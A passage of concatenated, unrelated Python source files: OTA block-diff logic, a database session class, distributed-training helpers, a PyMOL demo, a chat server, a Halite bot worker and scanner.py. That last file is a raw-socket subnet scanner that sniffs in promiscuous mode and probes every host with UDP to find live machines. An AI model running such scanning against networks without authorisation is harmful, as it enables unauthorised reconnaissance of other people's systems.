del x.incoming
del x.outgoing
self.transfers = new_transfers
def GenerateDigraph(self):
print("Generating digraph...")
# Each item of source_ranges will be:
# - None, if that block is not used as a source,
# - an ordered set of transfers.
source_ranges = []
for b in self.transfers:
for s, e in b.src_ranges:
if e > len(source_ranges):
source_ranges.extend([None] * (e-len(source_ranges)))
for i in range(s, e):
if source_ranges[i] is None:
source_ranges[i] = OrderedDict.fromkeys([b])
else:
source_ranges[i][b] = None
for a in self.transfers:
intersections = OrderedDict()
for s, e in a.tgt_ranges:
for i in range(s, e):
if i >= len(source_ranges): break
# Add all the Transfers in source_ranges[i] to the (ordered) set.
if source_ranges[i] is not None:
for j in source_ranges[i]:
intersections[j] = None
for b in intersections:
if a is b: continue
# If the blocks written by A are read by B, then B needs to go before A.
i = a.tgt_ranges.intersect(b.src_ranges)
if i:
if b.src_name == "__ZERO":
# the cost of removing source blocks for the __ZERO domain
# is (nearly) zero.
size = 0
else:
size = i.size()
b.goes_before[a] = size
a.goes_after[b] = size
def FindTransfers(self):
"""Parse the file_map to generate all the transfers."""
def AddSplitTransfers(tgt_name, src_name, tgt_ranges, src_ranges,
style, by_id):
"""Add one or multiple Transfer()s by splitting large files.
For BBOTA v3, we need to stash source blocks for resumable feature.
However, with the growth of file size and the shrink of the cache
partition source blocks are too large to be stashed. If a file occupies
too many blocks, we split it into smaller pieces by getting multiple
Transfer()s.
The downside is that after splitting, we may increase the package size
since the split pieces don't align well. According to our experiments,
1/8 of the cache size as the per-piece limit appears to be optimal.
Compared to the fixed 1024-block limit, it reduces the overall package
size by 30% for volantis, and 20% for angler and bullhead."""
# Possibly split large files into smaller chunks.
pieces = 0
cache_size = common.OPTIONS.cache_size
split_threshold = 0.125
max_blocks_per_transfer = int(cache_size * split_threshold /
self.tgt.blocksize)
# Change nothing for small files.
if (tgt_ranges.size() <= max_blocks_per_transfer and
src_ranges.size() <= max_blocks_per_transfer):
Transfer(tgt_name, src_name, tgt_ranges, src_ranges, style, by_id)
return
while (tgt_ranges.size() > max_blocks_per_transfer and
src_ranges.size() > max_blocks_per_transfer):
tgt_split_name = "%s-%d" % (tgt_name, pieces)
src_split_name = "%s-%d" % (src_name, pieces)
tgt_first = tgt_ranges.first(max_blocks_per_transfer)
src_first = src_ranges.first(max_blocks_per_transfer)
Transfer(tgt_split_name, src_split_name, tgt_first, src_first, style,
by_id)
tgt_ranges = tgt_ranges.subtract(tgt_first)
src_ranges = src_ranges.subtract(src_first)
pieces += 1
# Handle remaining blocks.
if tgt_ranges.size() or src_ranges.size():
# Must be both non-empty.
assert tgt_ranges.size() and src_ranges.size()
tgt_split_name = "%s-%d" % (tgt_name, pieces)
src_split_name = "%s-%d" % (src_name, pieces)
Transfer(tgt_split_name, src_split_name, tgt_ranges, src_ranges, style,
by_id)
def AddTransfer(tgt_name, src_name, tgt_ranges, src_ranges, style, by_id,
split=False):
"""Wrapper function for adding a Transfer()."""
# We specialize diff transfers only (which covers bsdiff/imgdiff/move);
# otherwise add the Transfer() as is.
if style != "diff" or not split:
Transfer(tgt_name, src_name, tgt_ranges, src_ranges, style, by_id)
return
# Handle .odex files specially to analyze the block-wise difference. If
# most of the blocks are identical with only few changes (e.g. header),
# we will patch the changed blocks only. This avoids stashing unchanged
# blocks while patching. We limit the analysis to files without size
# changes only. This is to avoid sacrificing the OTA generation cost too
# much.
if (tgt_name.split(".")[-1].lower() == 'odex' and
tgt_ranges.size() == src_ranges.size()):
# 0.5 threshold can be further tuned. The tradeoff is: if only very
# few blocks remain identical, we lose the opportunity to use imgdiff
# that may have better compression ratio than bsdiff.
crop_threshold = 0.5
tgt_skipped = RangeSet()
src_skipped = RangeSet()
tgt_size = tgt_ranges.size()
tgt_changed = 0
for src_block, tgt_block in zip(src_ranges.next_item(),
tgt_ranges.next_item()):
src_rs = RangeSet(str(src_block))
tgt_rs = RangeSet(str(tgt_block))
if self.src.ReadRangeSet(src_rs) == self.tgt.ReadRangeSet(tgt_rs):
tgt_skipped = tgt_skipped.union(tgt_rs)
src_skipped = src_skipped.union(src_rs)
else:
tgt_changed += tgt_rs.size()
# Terminate early if no clear sign of benefits.
if tgt_changed > tgt_size * crop_threshold:
break
if tgt_changed < tgt_size * crop_threshold:
assert tgt_changed + tgt_skipped.size() == tgt_size
print('%10d %10d (%6.2f%%) %s' % (tgt_skipped.size(), tgt_size,
tgt_skipped.size() * 100.0 / tgt_size, tgt_name))
AddSplitTransfers(
"%s-skipped" % (tgt_name,),
"%s-skipped" % (src_name,),
tgt_skipped, src_skipped, style, by_id)
# Intentionally change the file extension to avoid being imgdiff'd as
# the files are no longer in their original format.
tgt_name = "%s-cropped" % (tgt_name,)
src_name = "%s-cropped" % (src_name,)
tgt_ranges = tgt_ranges.subtract(tgt_skipped)
src_ranges = src_ranges.subtract(src_skipped)
# Possibly having no changed blocks.
if not tgt_ranges:
return
# Add the transfer(s).
AddSplitTransfers(
tgt_name, src_name, tgt_ranges, src_ranges, style, by_id)
print("Finding transfers...")
empty = RangeSet()
for tgt_fn, tgt_ranges in self.tgt.file_map.items():
if tgt_fn == "__ZERO":
# the special "__ZERO" domain is all the blocks not contained
# in any file and that are filled with zeros. We have a
# special transfer style for zero blocks.
src_ranges = self.src.file_map.get("__ZERO", empty)
AddTransfer(tgt_fn, "__ZERO", tgt_ranges, src_ranges,
"zero", self.transfers)
continue
elif tgt_fn == "__COPY":
# "__COPY" domain includes all the blocks not contained in any
# file and that need to be copied unconditionally to the target.
AddTransfer(tgt_fn, None, tgt_ranges, empty, "new", self.transfers)
continue
elif tgt_fn in self.src.file_map:
# Look for an exact pathname match in the source.
AddTransfer(tgt_fn, tgt_fn, tgt_ranges, self.src.file_map[tgt_fn],
"diff", self.transfers, self.version >= 3)
continue
b = os.path.basename(tgt_fn)
if b in self.src_basenames:
# Look for an exact basename match in the source.
src_fn = self.src_basenames[b]
AddTransfer(tgt_fn, src_fn, tgt_ranges, self.src.file_map[src_fn],
"diff", self.transfers, self.version >= 3)
continue
b = re.sub("[0-9]+", "#", b)
if b in self.src_numpatterns:
# Look for a 'number pattern' match (a basename match after
# all runs of digits are replaced by "#"). (This is useful
# for .so files that contain version numbers in the filename
# that get bumped.)
src_fn = self.src_numpatterns[b]
AddTransfer(tgt_fn, src_fn, tgt_ranges, self.src.file_map[src_fn],
"diff", self.transfers, self.version >= 3)
continue
AddTransfer(tgt_fn, None, tgt_ranges, empty, "new", self.transfers)
def AbbreviateSourceNames(self):
for k in self.src.file_map.keys():
b = os.path.basename(k)
self.src_basenames[b] = k
b = re.sub("[0-9]+", "#", b)
self.src_numpatterns[b] = k
@staticmethod
def AssertPartition(total, seq):
"""Assert that all the RangeSets in 'seq' form a partition of the
'total' RangeSet (ie, they are nonintersecting and their union
equals 'total')."""
so_far = RangeSet()
for i in seq:
assert not so_far.overlaps(i)
so_far = so_far.union(i)
assert so_far == total
|
session.py
|
import logging
import sys
import time
from threading import Thread
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy_utils import database_exists
from app.core import settings
from app.db import Base
from app.utils.decorators import use_callbacks
log = logging.getLogger(__name__)
class Session(sessionmaker):
"""Represents a database session."""
def __init__(self, use_sqlite: bool = False, **kw):
# Add a background task to try to connect to the database.
super().__init__(**kw)
self.engine = None
if use_sqlite:
# Manually call the error callback to use sqlite.
self.error_callback(BaseException("Using sqlite as stated."))
else:
thread = Thread(target=self.get_engine, args=(3, 1))
thread.daemon = True
thread.start()
def callback(self, pg_dns: str) -> None:
"""Execute when the pool is completed."""
log.info("Connection to the database successful.")
self.engine = create_engine(pg_dns)
self.kw["bind"] = self.engine
Base.metadata.create_all(self.engine, checkfirst=True)
def error_callback(self, error: BaseException) -> None:
"""Execute when the pool throws an error."""
log.info(error)
# Use sqlite if the connection to the database failed.
self.engine = create_engine(settings.sqlite_dns)
self.kw["bind"] = self.engine
Base.metadata.create_all(self.engine, checkfirst=True)
@use_callbacks
def get_engine(self, timeout: int, delay: int) -> str:
"""Get an engine depending on the settings db."""
for i in range(timeout):
log.debug(f"Connecting to database {'.' * (timeout - i)}")
if database_exists(settings.pg_dns):
return settings.pg_dns
time.sleep(delay)
raise ConnectionError("Could not connect to the database, using sqlite.")
if "pytest" in sys.modules:
settings.sqlite_dns = "sqlite:///pytest.sqlite3" # Use pytest.sqlite3
SessionLocal = Session(use_sqlite=True, autocommit=False, autoflush=False)
else:
SessionLocal = Session(autocommit=False, autoflush=False)
|
distributed.py
|
""" Pytorch Distributed utils
This piece of code was heavily inspired by the equivalent of Fairseq-py
https://github.com/pytorch/fairseq
"""
import os
import signal
import math
import pickle
import torch.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
def is_master(opt, device_id):
return opt.gpu_ranks[device_id] == 0
def multi_init(opt, device_id):
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip=opt.master_ip,
master_port=opt.master_port)
dist_world_size = opt.world_size
torch.distributed.init_process_group(
backend=opt.gpu_backend, init_method=dist_init_method,
world_size=dist_world_size, rank=opt.gpu_ranks[device_id])
gpu_rank = torch.distributed.get_rank()
if not is_master(opt, device_id):
logger.disabled = True
return gpu_rank
def all_reduce_and_rescale_tensors(tensors, rescale_denom,
buffer_size=10485760):
"""All-reduce and rescale tensors in chunks of the specified size.
Args:
tensors: list of Tensors to all-reduce
rescale_denom: denominator for rescaling summed Tensors
buffer_size: all-reduce chunk size in bytes
"""
# buffer size in bytes, determine equiv. # of elements based on data type
buffer_t = tensors[0].new(
math.ceil(buffer_size / tensors[0].element_size())).zero_()
buffer = []
def all_reduce_buffer():
# copy tensors into buffer_t
offset = 0
for t in buffer:
numel = t.numel()
buffer_t[offset:offset+numel].copy_(t.view(-1))
offset += numel
# all-reduce and rescale
torch.distributed.all_reduce(buffer_t[:offset])
buffer_t.div_(rescale_denom)
# copy all-reduced buffer back into tensors
offset = 0
for t in buffer:
numel = t.numel()
t.view(-1).copy_(buffer_t[offset:offset+numel])
offset += numel
filled = 0
for t in tensors:
sz = t.numel() * t.element_size()
if sz > buffer_size:
# tensor is bigger than buffer, all-reduce and rescale directly
torch.distributed.all_reduce(t)
t.div_(rescale_denom)
elif filled + sz > buffer_size:
# buffer is full, all-reduce and replace buffer with grad
all_reduce_buffer()
buffer = [t]
filled = sz
else:
# add tensor to buffer
buffer.append(t)
filled += sz
if len(buffer) > 0:
all_reduce_buffer()
def all_gather_list(data, max_size=4096):
"""Gathers arbitrary data from all nodes into a list."""
world_size = torch.distributed.get_world_size()
if not hasattr(all_gather_list, '_in_buffer') or \
max_size != all_gather_list._in_buffer.size():
all_gather_list._in_buffer = torch.cuda.ByteTensor(max_size)
all_gather_list._out_buffers = [
torch.cuda.ByteTensor(max_size)
for i in range(world_size)
]
in_buffer = all_gather_list._in_buffer
out_buffers = all_gather_list._out_buffers
enc = pickle.dumps(data)
enc_size = len(enc)
if enc_size + 2 > max_size:
raise ValueError(
'encoded data exceeds max_size: {}'.format(enc_size + 2))
assert max_size < 255*256
in_buffer[0] = enc_size // 255 # this encoding works for max_size < 65k
in_buffer[1] = enc_size % 255
in_buffer[2:enc_size+2] = torch.ByteTensor(list(enc))
torch.distributed.all_gather(out_buffers, in_buffer.cuda())
results = []
for i in range(world_size):
out_buffer = out_buffers[i]
size = (255 * out_buffer[0].item()) + out_buffer[1].item()
bytes_list = bytes(out_buffer[2:size+2].tolist())
result = pickle.loads(bytes_list)
results.append(result)
return results
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def batch_producer(generator_to_serve, queue, semaphore, opt, device_id):
"""Produce batches to `queues` from `generator_to_serve`."""
log_level = "INFO" if opt.verbose or device_id == 0 else "WARNING"
init_logger(opt.log_file, log_level=log_level)
set_random_seed(opt.seed, False)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch():
# NOTE: stride (if needed) is handled at the
# generator (train_iter) level
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch()
while True:
b.dataset = None
# Move batch to correspond device_id when consumer iterate
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
queue.put(b)
b = next_batch()
def consumer(process_fn, opt, device_id, error_queue, batch_queue, semaphore): # noqa: E501
"""Run `process_fn` on `device_id` with data from `batch_queue`."""
try:
gpu_rank = multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
process_fn(opt, device_id=device_id,
batch_queue=batch_queue, semaphore=semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
|
particle02.py
|
# demonstration of a particle cloud (non-interacting)
# similar to particle01.py except that each new state is retained in
# memory and used to assemble a movie with the number of states
# provided below
from random import random
from pymol import cmd
from time import sleep
particle_count = 1000
box_size = 500.0
n_states = 200
# constants
half_box = box_size / 2
# create N particle system [x,y,z,r,vx,vy,vz]
particle = []
for resi in range(0,particle_count):
particle.append([resi] +
map(lambda x:(random()-0.5)*box_size/2,[0]*3) + # x,y,z
[random()+0.5] + # r
map(lambda x:(random()-0.5),[0]*3) # vx,vy,vz
)
# create cloud object
for part in particle:
cmd.pseudoatom("cloud",
resi = part[0],
pos = part[1:4],
vdw = part[4])
# draw spheres efficiently
cmd.show_as("spheres")
cmd.unset("cull_spheres")
# defer geometry generation until needed
cmd.set("defer_builds",1)
# position the camera
cmd.zoom()
cmd.zoom("center",box_size)
# let there be color
cmd.spectrum()
# this is the main loop
def simulation():
state = 1
import traceback
try:
while state < n_states:
state = state + 1
for part in particle:
# simplistic Euler intergration
# p = p + v
part[1] = (half_box + part[1] + part[5]) % box_size - half_box
part[2] = (half_box + part[2] + part[6]) % box_size - half_box
part[3] = (half_box + part[3] + part[7]) % box_size - half_box
# v = v + pseudo-gravitational acceleration
factor = max(0.1*box_size, 0.1*(part[1]**2+part[2]**2+part[3]**2)**1.5)
part[5] = part[5] - part[1] / factor
part[6] = part[6] - part[2] / factor
part[7] = part[7] - part[3] / factor
# copy initial coordinates to a new state
cmd.create("cloud","cloud",1,state)
# update the new state coordinates
cmd.alter_state(state,"cloud","(x,y,z) = particle[int(resi)][1:4]",space=globals())
cmd.forward()
cmd.refresh()
# don't hog the CPU entirely
sleep(0.01)
cmd.mplay()
except:
traceback.print_exc()
# launch the main loop in a separate thread
import threading
thread = threading.Thread(target=simulation)
thread.setDaemon(1)
thread.start()
|
base.py
|
# Copyright 2021 iiPython
# Modules
import os
import time
from threading import Thread
from datetime import datetime
from .utils import Utils
from .console import Console
from .core.emoji.core import em
from .struct.status import codes
from .struct.client import Client
from .core.socket import Socket, SocketWrapper
try:
from iikp import readchar, keys
import importlib.util
_CMD_BAR_ENABLED = True
except ImportError:
_CMD_BAR_ENABLED = False
# Server class
class Server(object):
def __init__(self) -> None:
self.sock = Socket()
self.wrap = SocketWrapper(self.sock)
self.clients = []
self.console = Console()
self._exit = False
self._command = ""
self._user_check = None
# Module attribs
self.name = None
self.utils = Utils(self)
def to_dict(self) -> dict:
return {
"name": self.name,
"users": [client.to_dict() for client in self.clients]
}
def close(self) -> None:
# Shutdown clients
for client in self.clients:
client.shutdown()
# Exit server
self.console.print("\r[red]^C | Server shutdown successfully.")
os._exit(0) # Kills off our threads
def start(self, addr: tuple, name: str) -> None:
self.name = name
self.addr = addr
# Connect socket
self.sock.bind(("0.0.0.0", 2075))
self.sock.listen(5)
# Start text
self.console.clear()
self.console.print("[blue]Server running on [yellow]0.0.0.0:2075[blue]..")
# Client handler
Thread(target = self.command_bar).start()
Thread(target = self.refresh_all).start()
while True:
try:
conn, addr = self.sock.accept()
# Make note of this client
client = Client(self, (conn, addr))
if self._user_check is not None:
if not self._user_check(client, addr):
continue
# Handle thread
self.clients.append(client)
Thread(target = client.handle).start()
except KeyboardInterrupt:
return self.close()
def refresh_all(self) -> None:
while True:
if self._exit:
break
self.send_to_all({"status": codes.IGNORE})
time.sleep(1)
def send_to_all(self, data: dict) -> None:
if "content" in data:
data["content"] = em(data["content"])
for client in self.clients:
try:
if client.dead:
continue
client.sock.send_json(data)
except OSError:
self.clients.remove(client)
# Print to server
if data["status"] != codes.IGNORE:
time = datetime.now().strftime("%H:%M")
lines, idx = data["content"].split("\n"), 0
name = data["author"]["username"]
for line in lines:
if idx == 0:
self.print(f"[cyan]{time} [green]{name}[reset]: {line}")
else:
self.print(f"{' ' * len(f'{time} {name}')}| {line}[reset]")
idx += 1
def print(self, data: str) -> None:
self.console.print(f"\r{self.console.ts()}\r{data}\n\r{self.cmdbar_prompt()}", end = "")
def command_bar(self) -> None:
if not _CMD_BAR_ENABLED:
return
# Load modules
_modules = {}
_mod_dir = os.path.join(os.path.dirname(__file__), "modules")
for module in os.listdir(_mod_dir):
if module[0] == "_" or os.path.isdir(os.path.join(_mod_dir, module)):
continue
spec = importlib.util.spec_from_file_location(
module.replace(".py", "", 1),
os.path.abspath(os.path.join(_mod_dir, module))
)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
mod.init(self.utils)
_modules = _modules | mod.cmap
self._user_check = _modules.get("allow_user", None)
if self._user_check is not None:
_modules.pop("allow_user") # Not a command
# Loop
while True:
# Print command bar
self.console.print(f"\r{self.console.ts()}\r{self.cmdbar_prompt()}", end = "")
# Handle keypresses
key = readchar()
if isinstance(key, str):
self._command += key
elif key == keys.CTRL_C:
return self.close()
elif key == keys.BACKSPACE and self._command:
self._command = self._command[:-1]
elif key == keys.ENTER and self._command:
args = self._command.split(" ")
# Handle data
cmd = args[0]
args = args[1:]
# Find command
if cmd in _modules:
_modules[cmd](args)
# Reset
self._command = ""
def cmdbar_prompt(self) -> str:
return "" if not _CMD_BAR_ENABLED else self.console.print("[yellow]> [reset]", print_out = False) + self._command
# Initialization
server = Server()
|
webserver.py
|
'''
▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄
▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄
▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄
ZUMBY NSR CC [...]
'''
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I'm online"
def run():
app.run(host='0.0.0.0',port=xxxx)
def keep_alive():
t = Thread(target=run)
t.start()
|
scanner.py
|
import ipaddress
import os
import socket
import struct
import sys
import threading
import time
SUBNET = '192.168.1.0/24'
MESSAGE = 'PYTHONRULES!!!'
class IP:
def __init__(self, buff=None):
header = struct.unpack('<BBHHHBBH4s4s', buff)
self.ver = header[0] >> 4
self.ihl = header[0] & 0xF
self.tos = header[1]
self.len = header[2]
self.id = header[3]
self.offset = header[4]
self.ttl = header[5]
self.protocol_num = header[6]
self.sum = header[7]
self.src = header[8]
self.dst = header[9]
# human readable IP addresses
self.src_address = ipaddress.ip_address(self.src)
self.dst_address = ipaddress.ip_address(self.dst)
# map protocol constants to their names
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
try:
self.protocol = self.protocol_map[self.protocol_num]
except Exception as e:
print('%s No protocol for %s' % (e, self.protocol_num))
self.protocol = str(self.protocol_num)
class ICMP:
def __init__(self, buff):
header = struct.unpack('<BBHHH', buff)
self.type = header[0]
self.code = header[1]
self.sum = header[2]
self.id = header[3]
self.seq = header[4]
def udp_sender():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
for ip in ipaddress.ip_network(SUBNET).hosts():
time.sleep(1)
print('+', end='')
sender.sendto(bytes(MESSAGE, 'utf8'), (str(ip), 65212))
class Scanner:
def __init__(self, host):
self.host = host
if os.name == 'nt':
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
self.socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
self.socket.bind((host, 0))
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
print('hitting promiscuous mode...')
if os.name == 'nt':
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
def sniff(self):
hosts_up = set([f'{str(self.host)} *'])
try:
while True:
print('.',end='')
raw_buffer = self.socket.recvfrom(65535)[0]
ip_header = IP(raw_buffer[0:20])
if ip_header.protocol == "ICMP":
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + 8]
icmp_header = ICMP(buf)
if icmp_header.code == 3 and icmp_header.type == 3:
if ipaddress.ip_address(ip_header.src_address) in ipaddress.IPv4Network(SUBNET):
if raw_buffer[len(raw_buffer) - len(MESSAGE): ] == bytes(MESSAGE, 'utf8'):
hosts_up.add(str(ip_header.src_address))
print(f'Host Up: {str(ip_header.src_address)}')
# handle CTRL-C
except KeyboardInterrupt:
if os.name == 'nt':
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
print('\nUser interrupted.')
if hosts_up:
print(f'\n\nSummary: Hosts up on {SUBNET}')
for host in sorted(hosts_up):
print(f'{host}')
print('')
sys.exit()
if __name__ == '__main__':
if len(sys.argv) == 2:
host = sys.argv[1]
else:
host = '192.168.1.203'
s = Scanner(host)
time.sleep(10)
t = threading.Thread(target=udp_sender)
t.start()
s.sniff()
|
checkHeader.py
|
import openpyxl
import requests
import threading
import json
import os
def request_header(v, failed_links):
result = requests.head(str(v["avatar"]))
if result.status_code != 200:
failed_links[v["name"]] = str(v["avatar"])
def test_header(sheet, failed_links):
values = sheet["角色"].to_dict(orient="records")
thread_list = []
for v in values:
if str(v["avatar"]) == "nan":
# failed_links[v["name"]] = str(v["avatar"])
continue
t = threading.Thread(target=request_header, args=(v, failed_links))
thread_list.append(t)
t.start()
for t in thread_list:
t.join()
if __name__ == "__main__":
failed_links = {}
file = os.path.join(os.getcwd(), "tools", "relation.xlsx")
sheet = openpyxl.load_workbook(file)
test_header(sheet, failed_links)
if (len(failed_links) > 0) :
raise ValueError("failed links: {0}".format(failed_links))
|
worker.py
|
import argparse
import copy
import os
import sys
import os.path
import glob
import json
import random
import shutil
import subprocess
import tempfile
import traceback
import logging
import uuid
import socket
from time import sleep, gmtime, strftime
import datetime
import threading
from flask import Flask
import archive
import backend
import compiler
import util
# Flask start
app = Flask(__name__)
# Log it real good
LOG_FILENAME = "worker-log-{}.data".format(uuid.uuid4())
# Constraints on # and size of log files read from bots
MAX_LOG_FILES = 1
MAX_LOG_FILE_SIZE = 50 * 1024 # 50 KiB
# Used to ensure system is running (watchdog timer)
TIME = datetime.datetime.now()
TIME_THRESHOLD = 60 * 18 # 18 mins in s
# Used by Watchdog timer to keep time
LOCK = threading.Lock()
# Where to create temporary directories
TEMP_DIR = os.getcwd()
# The game environment executable.
ENVIRONMENT = "halite"
# The script used to start the bot. This is either user-provided or
# created by compile.py.
RUNFILE = "run.sh"
# The command used to run the bot. On the outside is a cgroup limiting CPU
# and memory access. On the inside, we run the bot as a user so that it may
# not overwrite files. The worker image has a built-in iptables rule denying
# network access to this user as well.
BOT_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c 'cd \"{bot_dir}\" && ./{runfile}'"
# Commands for Julia precompilation (see below)
COMPILE_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c \"cd \\\"{bot_dir}\\\" && {command}\""
JULIA_PRECOMPILE_COMMANDS = [
# Must remove this if it exists, Julia doesn't expect us to change
# permissions on it
"rm -f {bot_dir}/logs/manifest_usage.toml",
"JULIA_DEPOT_PATH=\$(pwd) julia --project -e 'using Pkg; eval(:(using \\$(Symbol(Pkg.API.Context().env.project[\\\"name\\\"]))))'",
]
COMPILE_ERROR_MESSAGE = """
Your bot caused unexpected behavior in our servers. If you cannot figure out
why this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
UPLOAD_ERROR_MESSAGE = """
We had some trouble uploading your bot. If you cannot figure out why
this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
class OndemandCompileError(Exception):
"""
Error for when compilation fails before an ondemand game.
"""
def __init__(self, language, log):
self.language = language
self.log = log
def makePath(path):
"""Deletes anything residing at path, creates path, and chmods the directory"""
if os.path.exists(path):
shutil.rmtree(path)
os.makedirs(path)
os.chmod(path, 0o777)
def give_ownership(top_dir, group, dir_perms):
"""Give ownership of everything in a directory to a given group."""
for dirpath, _, filenames in os.walk(top_dir):
shutil.chown(dirpath, group=group)
os.chmod(dirpath, dir_perms)
for filename in filenames:
shutil.chown(os.path.join(dirpath, filename), group=group)
os.chmod(os.path.join(dirpath, filename), dir_perms)
def rm_as_user(user, directory):
"""Remove a directory tree as the specified user."""
subprocess.call(["sudo", "-H", "-u", user, "-s", "rm", "-rf", directory],
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL)
def executeCompileTask(user_id, bot_id, backend):
"""Downloads and compiles a bot. Posts the compiled bot files to the manager."""
logging.debug("Compiling a bot with userID %s\n" % str(user_id))
errors = []
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
try:
bot_path = backend.storeBotLocally(user_id, bot_id, temp_dir,
is_compile=True)
archive.unpack(bot_path)
# Make sure things are in the top-level directory
while len([
name for name in os.listdir(temp_dir)
if os.path.isfile(os.path.join(temp_dir, name))
]) == 0 and len(glob.glob(os.path.join(temp_dir, "*"))) == 1:
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as bufferFolder:
singleFolder = glob.glob(os.path.join(temp_dir, "*"))[0]
for filename in os.listdir(singleFolder):
shutil.move(os.path.join(singleFolder, filename), bufferFolder)
os.rmdir(singleFolder)
for filename in os.listdir(bufferFolder):
shutil.move(os.path.join(bufferFolder, filename), temp_dir)
# Context manager takes care of buffer folder
# Delete any symlinks
subprocess.call(["find", temp_dir, "-type", "l", "-delete"])
# Give the compilation user access
os.chmod(temp_dir, 0o755)
# User needs to be able to write to the directory and create files
give_ownership(temp_dir, "bots", 0o2770)
# Reset cwd before compilation, in case it was in a
# deleted temporary folder
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
language, more_errors = compiler.compile_anything(temp_dir)
didCompile = more_errors is None
if more_errors:
errors.extend(more_errors)
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
try:
if didCompile:
logging.debug("Bot did compile\n")
# Make things group-readable
subprocess.call([
"sudo", "-H", "-u", "bot_compilation", "-s",
"chmod", "-R", "g+r", temp_dir,
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
archive_path = os.path.join(temp_dir, str(user_id)+".zip")
archive.zipFolder(temp_dir, archive_path)
backend.storeBotRemotely(user_id, bot_id, archive_path)
else:
logging.debug("Bot did not compile\n")
logging.debug("Bot errors %s\n" % str(errors))
backend.compileResult(user_id, bot_id, didCompile, language,
errors=(None if didCompile else "\n".join(errors)))
except Exception as e:
logging.error("Bot did not upload", e)
errors.append(UPLOAD_ERROR_MESSAGE + traceback.format_exc())
backend.compileResult(user_id, bot_id, False, language,
errors="\n".join(errors))
finally:
# Remove files as bot user (Python will clean up tempdir, but we don't
# necessarily have permissions to clean up files)
rm_as_user("bot_compilation", temp_dir)
def setupParticipant(user_index, user, temp_dir):
"""
Download and set up the bot for a game participant.
"""
# Include username to deal with duplicate bots
bot_dir = "{}_{}_{}".format(user["user_id"], user["bot_id"], user["username"])
bot_dir = os.path.join(temp_dir, bot_dir)
os.mkdir(bot_dir)
archive.unpack(backend.storeBotLocally(user["user_id"],
user["bot_id"], bot_dir))
if user.get("requires_compilation"):
compile_dir = bot_dir + '_compile'
try:
# Move to temp directory to avoid permission problems
# (can't chown files created by compile user back to us)
shutil.move(bot_dir, compile_dir)
# Give the compilation user access
os.chmod(compile_dir, 0o2755)
# User needs to be able to write to the directory
give_ownership(compile_dir, "bots", 0o2774)
language, errors = compiler.compile_anything(compile_dir)
didCompile = errors is None
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
if not didCompile:
# Abort and upload an error log
rm_as_user("bot_compilation", compile_dir)
raise OndemandCompileError(language, '\n'.join(errors))
# Move back to original directory
try:
shutil.copytree(compile_dir, bot_dir)
except shutil.Error as e:
logging.error("Could not compile bot ondemand", e)
rm_as_user("bot_compilation", compile_dir)
# Make the start script executable
os.chmod(os.path.join(bot_dir, RUNFILE), 0o755)
# Give the bot user ownership of their directory
# We should set up each user's default group as a group that the
# worker is also a part of. Then we always have access to their
# files, but not vice versa.
# https://superuser.com/questions/102253/how-to-make-files-created-in-a-directory-owned-by-directory-group
bot_user = "bot_{}".format(user_index)
bot_group = "bots_{}".format(user_index)
bot_cgroup = "bot_{}".format(user_index)
# We want 770 so that the bot can create files still; leading 2
# is equivalent to g+s which forces new files to be owned by the
# group
give_ownership(bot_dir, bot_group, 0o2770)
# For Julia bots, they -must- be precompiled before each game, as
